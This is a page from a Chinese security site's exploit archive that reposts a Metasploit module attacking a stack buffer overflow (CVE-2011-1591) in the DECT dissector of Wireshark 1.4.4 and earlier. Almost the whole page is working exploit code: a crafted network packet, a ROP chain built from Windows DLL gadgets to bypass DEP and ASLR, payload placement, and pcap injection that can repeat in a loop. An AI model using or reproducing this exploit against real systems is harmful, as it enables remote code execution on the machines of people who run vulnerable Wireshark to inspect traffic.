首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow
来源:http://www.metasploit.com 作者:Makowski 发布时间:2011-04-22  

##
# $Id: wireshark_packet_dect.rb 12371 2011-04-19 16:41:58Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking

 include Msf::Exploit::Remote::Capture

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (remote)',
   'Description'    => %q{
     This module exploits a stack buffer overflow in Wireshark <= 1.4.4
    by sending an malicious packet.)
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'Paul Makowski',  #Initial discovery
     'sickness',       #proof of concept
     'corelanc0d3r',   #rop exploit + msf module
    ],
   'Version'        => '$Revision: 12371 $',
   'References'     =>
    [
     [ 'CVE', '2011-1591'],
     [ 'OSVDB', '71848'],
     [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838' ],
     [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836' ],
     [ 'URL', 'http://www.exploit-db.com/exploits/17185' ],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
    },
   'Payload'        =>
    {
     'Space'       => 936,
     'DisableNops' => 'True',
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Win32 Universal (Generic DEP & ASLR Bypass)',
      {
       'OffSet' => 1243,
       'Ret'    => 0x667c484d, #libgnutl pivot - tx Lincoln
      }
     ],
    ],
   'Privileged'     => false,
   'DisclosureDate' => 'Apr 18 2011',
   'DefaultTarget'  => 0))

  register_options([
   OptBool.new('LOOP', [true,  'Send the packet every X seconds until the job is killed', false]),
   OptInt.new('DELAY', [true,  'This option sets the delay between sent packets', 5])
  ], self.class)

  register_advanced_options([
   OptBool.new("ExitOnSession", [ false, "Return from the exploit after a session has been created", true ]),

  ], self.class)

  deregister_options('FILTER','PCAPFILE','RHOST','SNAPLEN','TIMEOUT','UDP_SECRET','NETMASK','GATEWAY')


 end
 
 def junk
  return rand_text(4).unpack("L")[0].to_i
 end

 def exploit

  ptype = "\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x23\x23"

  print_status("Preparing payload")

  pivot = [target.ret].pack('V')

  # pvefindaddr rop 'n roll
  # tx dadr00p (https://twitter.com/dietersar) for testing the offsets below
  rop_pivot =
  [
   0x618d7d0e,     # RET  
   0x618d7d0e,     # RET  
   0x618d7d0e,     # RET  
   0x64f9d5ec,     # ADD ESP,0C # RET - libfontconfig-1.dll
   0x618d7d0e,     # RET <- don't count on this one !
   0x618d7d0e,     # RET
   0x618d7d0e,     # RET
   0x618d7d0e,     # RET
   0x61C14268,     # ADD ESP,24 # RETN - freetype6.dll
   0xFFFFFFFF,     # crash baby !
   0xFFFFFFFF,
   0xFFFFFFFF,
   0xFFFFFFFF,
   0xFFFFFFFF,
   0x618d7d0e,
   0x618d7d0e,
   0x618d7d0e,
   0x618d7d0e,
  ].pack("V*")

  rop_gadgets =
  [
 
   0x6d7155cb,     # PUSH ESP # POP EBX # POP EBP # RETN  **[libpangoft2-1.0-0.dll]
   junk,
   0x6d596e31,     # MOV EAX,EBX # POP EBX # POP EBP # RETN  **[libgio-2.0-0.dll]
   junk,
   junk,
   0x61c14552,     # POP EBX # RETN    ** [freetype6.dll]
   0x00000800,     # size - 0x800 should be more than enough
   0x61c14043,     # POP ESI # RETN    ** [freetype6.dll] 
   0x0000009C,
   0x6d58321a,     # ADD EAX,ESI # POP ESI # POP EBP # RETN    **[libgio-2.0-0.dll]
   junk,
   junk,
   0x68610a27,     # XCHG EAX,EBP # RETN    ** [libglib-2.0-0.dll]
   0x629445a6,     # POP EAX # RETN    ** [libatk-1.0-0.dll]
   0x62d9027c,     #
   0x6c385913,     # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN  ** [libgdk-win32-2.0-0.dll]
   0x617bc526,     # XCHG EAX,ESI # ADD AL,10 # ADD CL,CL # RETN    ** [libgtk-win32-2.0-0.dll]
   0x64f8c692,     # POP EDX # RETN    ** [libfontconfig-1.dll]
   0x00000040,     #
   0x619638db,     # POP ECX # RETN    ** [libgtk-win32-2.0-0.dll]
   0x6536B010,     # RW
   0x618d7d0d,     # POP EDI # RETN    ** [libgtk-win32-2.0-0.dll]
   0x618d7d0e,     # RET
   0x64fa0c15,     # POP EAX # RETN    ** [libfontconfig-1.dll]
   0x618d7d0e,     # RET
   0x61963fdb,     # PUSHAD # RETN     ** [libgtk-win32-2.0-0.dll]
  ].pack("V*")

  pivot = [target.ret].pack('V')

  buffer = rand_text(131)
  buffer << rop_pivot
  buffer << rop_gadgets

  nops = make_nops(target['OffSet'] - (buffer.length) - (payload.encoded.length))

  buffer << nops
  buffer << payload.encoded
  buffer << pivot

  filler = 1500 - buffer.length

  buffer << rand_text(filler)

  pkt = ptype
  pkt << buffer

  print_status("Sending malicious packet")
  open_pcap()
   
  handler

  if datastore['LOOP']
   while true
    break if session_created? and datastore['ExitOnSession']
    inject(pkt)
    select(nil,nil,nil,datastore['DELAY'])
   end
  else
   inject(pkt)
  end

  close_pcap
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux/x86 - netcat bindshell p
·Gesytec ElonFmt ActiveX 1.1.14
·QtWeb Browser 3.7.2 Denial Of
·docuFORM Mercury WebApp 6.16a/
·KMPlayer 2.9.x (.kpl) Stack Bu
·Spreecommerce Arbitrary Comman
·Windows Media Player 11 .ogg P
·PHP phar extension 1.1.1 Heap
·Media Player Classic 6.4.9.1 P
·Google Chrome 10.0.648.205 Sta
·IBM Tivoli Directory Server SA
·Adobe Flash Player < 10.1.53 .
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved